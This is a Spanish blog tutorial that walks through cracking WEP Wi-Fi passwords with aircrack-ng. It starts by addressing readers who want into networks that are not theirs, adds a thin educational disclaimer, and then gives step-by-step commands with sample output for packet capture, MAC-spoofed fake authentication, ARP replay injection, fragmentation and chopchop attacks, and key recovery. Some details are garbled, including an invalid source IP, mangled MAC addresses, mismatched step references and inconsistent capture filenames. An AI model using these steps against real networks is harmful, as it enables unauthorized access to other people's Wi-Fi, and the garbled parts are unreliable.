Cuantos de nosotros no hemos intentado acceder a una red wifi que no es nuestra? …

Pues bien, explicare como llevar acabo este tipo de ataques; espero que sea utilizado para fines educativos y demostrar que las redes wifi con seguridad WEP es lo mas debil para nuestra redes.

Tambien debo agregar que esto lo realice utilizando Ubuntu 9.10 , y los programas Aircrack y Airodump.

Fuente: Terrible Linux

Instalar Aircrack-ng

Como primer paso es la instalcion de este programa el cual nos permitira cifrar la contraseña WEP,ademas de eso viene con otras herramientas incluidas como el Airodump, Airocap, entre otras.

Para instalar tecleamos el siguiente comando en la terminal:

sudo apt-get install aircrack


Cómo usar Aircrack

Lo primero es abrir un terminal y nos logueamos como super usuario:

$ sudo su


Como segundo paso, pasamos nuestra targeta a modo monitor el cual nos servira para hacer una captura de paquetes y observar las redes que tienen trafico.

airmon-ng start wlan0

si observan bien el resultado que nos lanza, muestra el nombre que recibira nuestra conexion en modo monitor, en mi caso mon0 (cero).

El tercer paso, es ver las redes wifi a las cuales podemos acceder:

airodump-ng mon0

Consejos:

Sustituye “mon0″ por la interface de tu tarjeta wireless (mira cuál es con el comando iwconfig).

Si te da un error del tipo “resource busy” significa que estás conectado a otra red wifi. Para que funcione simplemente desconectate de la red.

Una vez hecho esto nos sacara algo asi:
Auditoria wireless (WIFI) – descifrar contraseñas wep

Redes con Trafico

En este caso tenemos 2 redes a elegir, nos fijamos en la red ‘gatowifi’ con una MAC de 00:00:00:00:00:00 en el canal CH 11, ya que si puede observar en el campo “”DATA”” reporta una serie de paquetes los cuales nos indica que hay trafico para nuestra captura,ahora suponiendo que este es nuestro objetivo nos fijamos en que tenga modo de encriptacion WEP.

Consejos:

Para que airodump deje de actualizar los datos pulsa “Ctrol+C”.

Puedes hacer búsquedas más detalladas usando las opciones que aparecen al ejecutar “airodump –help”

Ahora que ya tenemos fijado un objetivo lo que vamos a hacer es capturar Data y Beacons para luego lanzar aircrack-ng y descifrar su clave WEP.

1. Lanzamos airodump-ng para que capture paquetes:

airodump-ng –channel 11 –bssid 00:00:00:00:00:00 -w captura mon0

Esta captura se guardara en la carpeta donde estemos hubicados, en mi caso la /home.

2. Ahora vamos a autenticar con la estacion para que nos permita inyectar trafico y asi tener más datos para sacar la contraseña antes.

aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e gatowifi mon0

en la opcion -h ocultamos nuestra MAC con una introducida (inventada) por nosotros

Nos deberia decir al final:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful


3. Insertaremos paquetes ARP e intentar acelerar la inyección. Abrimos otra consola y

aireplay-ng -3 -b 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e gatowifi mon0

este tambien lo dejamos correr mientras que trabajamos.

4. Lanzar aircrack-ng para descifrar la contraseña:

aircrack-ng -a 1 -e gatowifi -b 00:00:00:00:00:00 captura-01.cap

El argumento “-a 1″ indica que estamos descifrando una contraseña WEP, para descifrar una WAP deberiamos poner “-a 2″.

Aircrack-ng tambien se debe dejar correr de fondo mientras se capturan paquetes porque ira intentando descifrar la clave segun vaya consiguiendo nuevos paquetes.

Esto seria todo por el momento, solo es cuestion de esperar unos minutos para decifrar la contraseña.

_____________________
Redes sin Trafico

Bien, hasta el momento he escrito lineas con una red que tiene trafico en su campo “DATA”, pero que pasaría si no hubiese ese trafico y el campo “DATA” se mantuviera en cero? ,eso quiere decir que tendremos que generar el trafico con nuevos ataques , en este caso llamados CHOP CHOP o ataque de FRAGMENTACION , los cuales consisten en generar un paquete con la encriptación WEB e inyectarlo, así podriamos generar el trafico que necesitaremos.
Ahora explicare como llevar acabo estos pasos, aunque debo decir que para empezar tendran que seguir el post hasta el punto 3 y la autentificación del punto 2 que se haya completado satisfactoriamente.

5. Ataque de fragmentación

En un terminal escribimos:

aireplay-ng -5 -b 00:00:00:00:00:00 -h 11:22:33:44:55:66 mon0

Donde:

* -5 significa ataque de fragmentación.
* -b 00:00:00:00:00:00 es la dirección MAC del punto de acceso.
* -h 11:22:33:44:55:66 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en la falsa autenticación.
* mon0 es el nombre de nuestra interface.

Al ejecutar este comando mostrara algo como esto:

aireplay-ng -5 -b 00:00:00:00:00:00 -h 11:22:33:44:55:66 mon0
Waiting for a data packet...
Read 127 packets...


Size: 114, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 01:00:5E:00:00B
Source MAC = 00:404:77:E5:C9

0×0000:0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B….^…..l~
0×0010:0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R….0s
0×0020:c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.”…..A6r.
0×0030:4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M.
0×0040:8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX…z.+.>…
0×0050:4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m….U2….
0×0060:c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(….”m.q
0×0070:9c9f ..

Use this packet ? y


en donde precionamos las tecla “y” para continuar.

Si muestra algo como esto:

Saving chosen packet in replay_src-0203-180328.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0203-180343.xor
Now you can build a packet with ...


Es que hemos tenido exito y se debe haber generado un paquete “fragment-0203-180343.xor” el cual lo podremos usar en el paso 7 para generar un paquete arp.

6. Ataque chopchop

Este ataque lo llevaremos acabo siempre y cuando el ataque 4 no haya funcionado.
Escribimos en un terminal:

aireplay-ng -4 mon0 -h 11:22:33:44:55:66

Donde:
* -4 significa ataque chopchop.
* -h 11:22:33:44:55:66 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en Dla falsa autenticación.
* mon0 es el nombre de nuestra interface.

Al ejecutarse mostrara algo como esto:

Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FFFFFFF
Source MAC = 00:404:77:E5:C9
0×0000:0842 0000 ffff ffff ffff 0014 6c7e 4080 .B……….l~
0×0010:0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:…._.
0×0020:e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 …H……._=.
0×0030:d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ….j…..%.[.
0×0040:16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C…>.q.r.e.
0×0050:cfeb 4a72 be46 ..Jr.F<


Use this packet ? y


Precionamos la tecla “y” y todo continua.

Saving chosen packet in replay_src-0201-191639.cap
Offset 85 ( 0% done) | xor = D3 | pt = 95 |
Offset 84 ( 1% done) | xor = EB | pt = 55 |
Offset 83 ( 3% done) | xor = 47 | pt = 35 |
Offset 82 ( 5% done) | xor = 07 | pt = 4D |
Offset 81 ( 7% done) | xor = EB | pt = 00 |
Offset 80 ( 9% done) | xor = CF | pt = 00 |
Offset 79 (11% done) | xor = 05 | pt = 00 |
Offset 78 (13% done) | xor = 69 | pt = 00 |
Offset 77 (15% done) | xor = CA | pt = 00 |
Offset 76 (17% done) | xor = 65 | pt = 00 |
Offset 75 (19% done) | xor = 9E | pt = 00 |
Offset 74 (21% done) | xor = 72 | pt = 00 |
Offset 73 (23% done) | xor = 01 | pt = 00 |
Offset 72 (25% done) | xor = 71 | pt = 00 |
Offset 71 (26% done) | xor = A1 | pt = 00 |
Offset 70 (28% done) | xor = 3E | pt = 00 |
Offset 69 (30% done) | xor = BB | pt = 00 |
Offset 68 (32% done) | xor = AE | pt = 00 |
Offset 67 (34% done) | xor = FB | pt = 00 |
Offset 66 (36% done) | xor = 43 | pt = 00 |
Offset 65 (38% done) | xor = D4 | pt = 00 |
Offset 64 (40% done) | xor = 16 | pt = 00 |
Offset 63 (42% done) | xor = 7F | pt = 0C |
Offset 62 (44% done) | xor = 1F | pt = 37 |
Offset 61 (46% done) | xor = 5C | pt = A8 |
Offset 60 (48% done) | xor = 9B | pt = C0 |
Offset 59 (50% done) | xor = 91 | pt = 00 |
Offset 58 (51% done) | xor = 25 | pt = 00 |
Offset 57 (53% done) | xor = 94 | pt = 00 |
Offset 56 (55% done) | xor = F3 | pt = 00 |
Offset 55 (57% done) | xor = D6 | pt = 00 |
Offset 54 (59% done) | xor = FA | pt = 00 |
Offset 53 (61% done) | xor = EA | pt = 01 |
Offset 52 (63% done) | xor = 5D | pt = 37 |
Offset 51 (65% done) | xor = 33 | pt = A8 |
Offset 50 (67% done) | xor = CC | pt = C0 |
Offset 49 (69% done) | xor = 03 | pt = C9 |
Offset 48 (71% done) | xor = 34 | pt = E5 |
Offset 47 (73% done) | xor = 34 | pt = 77 |
Offset 46 (75% done) | xor = 51 | pt = F4 |
Offset 45 (76% done) | xor = 98 | pt = 40 |
Offset 44 (78% done) | xor = 3D | pt = 00 |
Offset 43 (80% done) | xor = 5E | pt = 01 |
Offset 42 (82% done) | xor = AF | pt = 00 |
Offset 41 (84% done) | xor = C4 | pt = 04 |
Offset 40 (86% done) | xor = CE | pt = 06 |
Offset 39 (88% done) | xor = 9D | pt = 00 |
Offset 38 (90% done) | xor = FD | pt = 08 |
Offset 37 (92% done) | xor = 13 | pt = 01 |
Offset 36 (94% done) | xor = 83 | pt = 00 |
Offset 35 (96% done) | xor = 4E | pt = 06 |
Sent 957 packets, current guess: B9…
The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.
Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor
Completed in 21s (2.29 bytes/s)

Esto quiere decir que hemos tenido exito y que ya se ha generado el paquete “replay_dec-0201-191706.xor” el cual lo podremos usar en el siguiente paso para generar un paquete arp.

7. Vamos a usar packetforge-ng para crear un paquete arp

Con los puntos 4 o 5 se debe haber generado un PRGA el cual se encuentra en los archivos con extensión “xor”.Podemos entonces usar este PRGA para generar un paquete para inyectar.
Generaremos un paquete arp para la inyección:

packetforge-ng -0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request

Donde:
* -0 significa generar un paquete arp.
* -a 00:00:00:00:00:00 es la dirección MAC del punto de acceso.
* -h 11:22:33:44:55:66 es la dirección MAC de nuestra tarjeta wireless.
* -k 255.255.255.255 es la IP de destino (la mayoría de los APs responden a 255.255.255.255).
* -l 255.255.255.255.255 es la IP de origen (la mayoría de los APs responden a 255.255.255.255).
* -y fragment-0203-180343.xor es el archivo del que se leerá el PRGA.
* -w arp-request es el nombre del archivo en el que se guardará el paquete arp.

y se mostraría algo como esto:

# Wrote packet to: arp-request

8. Inyectar el paquete arp

Abrimos un terminal y escribimos:

aireplay-ng -2 -r arp-request mon0

Donde:

*-2 significa que usamos el modo interactivo para seleccionar el paquete
*-r arp-request especificamos el nombre del archivo con el paquete arp
*mon0 es el nombre de nuestra interface

Al ejecutar nos mostrara lo siguiente:


Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80

Dest. MAC = FFF
FFFF
Source MAC = 00:09:5B:EC:EE2

0×0000:0841 0201 0014 6c7e 4080 0009 5bec eef2 .A….l~@…[.
0×0010:ffff ffff ffff 8001 8f00 0000 7af3 8be4 …………z.
0×0020:c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ………..q.Z
0×0030:f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ….U..>……
0×0040:6ada 92f2 j…

Use this packet ? y


Escribimos la tecla “y” para usar este paquete y aparecera algo como esto:


Saving chosen packet in replay_src-0204-104917.cap
You should also start airodump-ng to capture replies.
End of file.


Por ultimo miramos la ventana que ejecutamos con airodump y veremos como los paquetes empiezan a subir rapidamanete.

9. Ejecutamos aircrack para obtener la clave web

aircrack-ng -z -b 00:00:00:00:00:00 capture*.cap

Donde:

* -z significa que se use el método PTW para obtener más rápido la clave WEP
* capture*.cap selecciona todos los archivos que comienzan por “capture” y con extensión “cap”.
* -b 00:00:00:00:00:00 selecciona el punto de acceso en el que estamos interesados

Espero que esta guía les sea util .

Fuente: Terrible Linux